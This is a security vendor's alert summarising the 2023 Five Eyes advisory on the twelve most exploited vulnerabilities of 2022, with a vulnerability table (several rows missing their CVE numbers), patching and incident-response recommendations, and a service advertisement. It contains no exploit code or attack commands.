Take steps to reduce the risk of compromise by malicious actors still exploiting these vulnerabilities.
Released August 3, 2023 – Alert Code AA23-215A
Five Eyes cybersecurity authorities, including the FBI, CISA, and the NSA, have released a list of the 12 most exploited vulnerabilities of 2022.
Cybersecurity agencies worldwide are being asked to address these security flaws and deploy patch management systems to reduce potential attacks. Threat actors focused on outdated software vulnerabilities rather than recently disclosed ones, specifically targeting unpatched systems left exposed on the internet.
The joint advisory notes that proof of concept code was publicly available for many of the software vulnerabilities, which likely facilitated exploitation by a broader range of malicious cyber actors. Despite over 25,000 new security vulnerabilities being published by the Common Vulnerabilities and Exposures (CVE) Program, only five made it to the top 12 list of exploited flaws in 2022.
Below is the list of the 12 most exploited security flaws last year and relevant links to the National Vulnerability Database entries.
CVE | Vendor | Product | Type |
Fortinet | FortiOS and FortiProxy | SSL VPN credential exposure | |
CVE-2021-34473 (Proxy Shell) | Microsoft | Exchange Server | RCE |
CVE-2021-31207 (Proxy Shell) | Microsoft | Exchange Server | Security Feature Bypass |
CVE-2021-34523 (Proxy Shell) | Microsoft | Exchange Server | Elevation of Privilege |
Zoho | ADSelfService Plus | RCE/Auth Bypass | |
Atlassian | Confluence Server/Data Center | Arbitrary code execution | |
CVE-2021- 44228 (Log4Shell) | Apache | Log4j2 | RCE |
VMware | Workspace ONE | RCE | |
VMware | Workspace ONE | Improper Privilege Management | |
F5 Networks | BIG-IP | Missing Authentication | |
Microsoft | Multiple Products | RCE | |
Atlassian | Confluence Server/Data Center | RCE |
The first spot goes to CVE-2018-13379, a Fortinet SSL VPN vulnerability the company fixed four years ago, in May 2019. The bug was abused by state hackers to breach U.S. government elections support systems.
"Organizations continue using unpatched software and systems, leaving easily discovered openings for cyber actors to target," warned Neal Ziring, the Technical Director for NSA's Cybersecurity Directorate.
"Older vulnerabilities can provide low-cost and high impact means for these actors to access sensitive data."
Relevance
IT Infrastructure Security
Recommendations
Apply timely patches to systems.
Check for signs of compromise if CVEs identified in this CSA have not been patched.
Implement a centralized patch management system.
Maintain and update cybersecurity incident response plan that is tested at least annually.
Use security tools, such as endpoint detection and response (EDR), web application firewalls, and network protocol analyzers.
Incident Response
Isolate any infected systems and quarantine the system.
Notify relevant parties according to your Incident Response Plan
Reach out to cybersecurity professionals to help contain the attack, analyze the risk, and devise a recovery plan.
References
1. FBI, CISA, and NSA reveal top exploited vulnerabilities of 2022. (2023, August 3). BleepingComputer. https://www.bleepingcomputer.com/news/security/fbi-cisa-and-nsa-reveal-top-exploited-vulnerabilities-of-2022/?&web_view=true
2. 2022 Top Routinely Exploited Vulnerabilities. (2023, August 3). Cisa.gov https://www.cisa.gov/news-events/cybersecurity-advisories/aa23-215a
How can CyberForce|Q services help you address this risk?
Partner with CyberForce|Q our cybersecurity experts can assist with writing and implementing a patch management system for your organization. Also, our Incident Response team can work with you to help develop, implement, and test your incident response plan. Customized Tabletop exercises are encouraged for all organizations. Our cutting-edge Security Operations Center is purpose-bult to tackle the challenge of monitoring your systems 24x7x265. By leveraging our services, we can help minimize the risk associated with an IT Infrastructure Security risk with measurable results.
Learn more about CyberForce|Q.
Learn more about our Q|FRAME Assessment Services.
Comments